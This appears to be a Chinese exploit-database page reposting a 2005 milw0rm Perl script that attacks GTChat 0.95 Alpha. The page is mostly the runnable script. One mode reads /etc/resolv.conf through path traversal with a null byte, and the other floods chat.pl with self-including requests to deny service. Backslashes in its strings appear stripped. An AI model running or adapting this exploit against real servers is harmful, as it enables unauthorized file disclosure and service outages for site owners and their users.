GTChat 0.95 Alpha – Remote Denial of Service
漏洞ID | 1055341 | 漏洞类型 | |
发布时间 | 2005-08-18 | 更新时间 | 2005-08-18 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
use LWP::Simple;
if (@ARGV < 3)
{
print "nUsage: $0 [server] [path] [mode] [count for DoS]n";
print "sever - URL chatn";
print "path - path to chat.pln";
print "mode - poc or dos,n";
print " poc - simple check without DoS and exit,n";
print " dos - DoS, you must set count for requests in 4 argument.nn";
exit ();
}
$DoS = "dos";
$POC = "poc";
$server = $ARGV[0];
$path = $ARGV[1];
$mode = $ARGV[2];
$count = $ARGV[3];
print qq(
###################################
# GTChat <= 0.95 Alpha remote DoS #
# tested on GTChat 0.95 Alpha #
# (c)oded by x97Rang 2005 RST/GHC #
# Respect: b1f, 1dt.w0lf, ed #
################################### );
if ($mode eq $POC)
{
print "nnTry read file /etc/resolv.conf, maybe remote system unix...n";
$URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0nHost: %snAccept:*/*nConnection:closenn",$server,$path,$server);
$content = get "$URL";
if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/)
{ print "File read successfully, remote system is *nix and $server are VULNERABLE!n"; exit(); }
if ($content =~ /Fatal error/)
{
print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:n";
print "=== OUTPUT ===============================================================================n";
print "n$contentn";
print "=============================================================================== OUTPUT ===n";
exit();
}
else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)n"; }
}
if ($mode eq $DoS)
{
if (!($count)) { print "nNeed count for DoS requests, you don't set it, exit...n"; exit() }
print "nSend $count DoS requests to $server...n";
$URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0nHost: %snAccept:*/*nConnection:closenn",$server,$path,$server);
for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
print "Done, packets sended.n";
}
# milw0rm.com [2005-08-18]
相关推荐: PHPWebSite User Module HTTP Response Splitting Vulnerability
PHPWebSite User Module HTTP Response Splitting Vulnerability 漏洞ID 1097665 漏洞类型 Input Validation Error 发布时间 2004-11-04 更新时间 2004-11…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666